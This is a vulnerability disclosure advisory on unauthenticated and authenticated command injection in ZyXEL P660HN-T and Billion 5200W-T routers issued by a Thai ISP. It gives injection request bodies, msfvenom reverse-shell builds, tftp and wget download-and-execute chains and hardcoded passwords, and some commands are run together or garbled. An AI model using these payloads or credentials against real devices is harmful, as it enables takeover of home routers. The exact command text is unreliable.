SSD Advisory ZyXEL Multiple Vulnerabilities

Vulnerability Summary

The following advisory describes four (4) vulnerabilities and default accounts / passwords in ZyXEL customized routers.

TrueOnline is a major Internet Service Provider in Thailand that provides customized versions of routers to its customers, free of charge.

The routers are manufactured by ZyXEL, and they run a special linux distribution called “tclinux”. Several models are distributed by TrueOnline, three in particular are widespread:

ZyXEL P660HN-T v1 (distributed up to 2013) ZyXEL P660HN-T v2 Billion 5200W-T (currently being distributed to new clients)

These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run BOA web server. The routers are vulnerable via command injections in its web interface, which can be exploited by an unauthenticated as well as an authenticated attacker. Furthermore, the routers includes several hardcoded accounts besides the usual administrator account.

The four vulnerabilities found in ZyXEL routers:

Unauthenticated remote command execution vulnerability P660HN-T v1 router Unauthenticated remote command execution vulnerability Billion 5200W-T Authenticated remote command execution vulnerability Billion 5200W-T Unauthenticated remote command execution vulnerability P660HN-T v2

Default accounts and passwords:

Default accounts- P660HN-T v1 router Default accounts P660HN-T v2 Default accounts Billion 5200W-T router

Credit

An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Unauthenticated remote command execution vulnerability P660HN-T v1 router

The P660HN-T v1 router has a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log

Remote host: ;command;#

The vulnerability is can be found in the ViewLog.asp page, which is accessible unauthenticated.

POST /cgi-bin/ViewLog.aspHTTP/1.1 remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save

The command injection is in remote_host parameter:

remote_host=%3bping+-c+3+10.0.99.102%3b%23

Proof of Concept

To preform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.binlhost=192.168.1.35 lport=4444

Which will serve the /tmp directory through the tftp service.

This should be followed by downloading and executing a shell by injecting the following command:

cdtmp; tftp -g -r shell.bin 10.13.37.1; chmod +x /tmp/shell.bin; /tmp/shell.bin Default accounts- P660HN-T v1 router username: admin; password: password username: true; password: true

Unauthenticated remote command execution vulnerability Billion 5200W-T

There’s an unauthenticated command injection in the adv_remotelog.asp file:

POST /cgi-bin/adv_remotelog.aspHTTP/1.1 Host: 192.168.1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 85 RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514

The injection is in the syslogServerAddr parameter that can be exploited by entering a valid IP address, followed by “;<COMMAND>;”

Proof of Concept

Same as the previously mentioned unauthenticated remote command execution vulnerability P660HN-T v1, the only difference is the target device.

Authenticated command execution vulnerability Billion 5200W-T

The Billion 5200W-T has a authenticated command injections in its interface tools_time.asp with the uiViewSNTPServer parameter:

POST /cgi-bin/tools_time.aspHTTP/1.1 Host: 127.0.0.1:10080 Authorization: BasicYWRtaW46cGFzc3dvcmQ= Cookie: SESSIONID=7c082c75 Content-Length: ... SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0 &uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29 &uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute= &uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+127.0.0.1+%26%23 &ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA

This request will write the text, which is the command you want it to execute, to a file named /etc/ntp.sh :

/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 127.0.0.1 " &

Which is then executed.

Default accounts Billion 5200W-T router username: admin; password: password username: true; password: true username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678

Unauthenticated command execution vulnerability P660HN-T v2

The remote command vulnerability is composed from an authenticated command injection and a hardcoded supervisor password. The command injection vulnerability is in the logSet.asp file and the hardcoded supervisor password is username: supervisor; password: zyad1234.

POST /cgi-bin/pages/maintenance/logSetting/logSet.aspHTTP/1.1 Content-Length: ... logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping -c 3 1.1.1.1`%26%23&serverPort=514

This will be written to /etc/syslog.conf file as:

ServerIP="192.168.1.1 `ping -c 3 1.1.1.1`"

Which will then be executed by the syslog background process.

The injection parameter is the ServerIP :

ServerIP=1.1.1.1`<command />`

The actual command that can be injected has a length limitation of 28 characters.

Proof of Concept

To preform the attack, the following MSF command line should be used:

msfvenom -p linux/mipsbe/shell_reverse_tcp -f elf -o /tmp/shell-be.binlhost=192.168.1.35 lport=4444

Which will serve the /tmp directory through the tftp service.

Authenticate to interface with supervisor:zyad1234

Write the following file /tmp/a by doing several injections (the injection accepts only 10 and 13 characters at a time).

#!/bin/sh wget -q -O /tmp/b http://10.13.37.1/b chmod +x /tmp/b /tmp/b

Then inject the following commands:

chmod +x /tmp/a /tmp/a Default accounts P660HN-T v2 router username: admin; password: password username: true; password: true username: supervisor; password: zyad1234

Vendor Response

We notified ZyXEL of the vulnerabilities back in July 2016, repeated attempts to re-establish contact and get some answer on the status of the patches for these vulnerabilities went unanswered. At this time there is no solution or workaround for these vulnerabilities.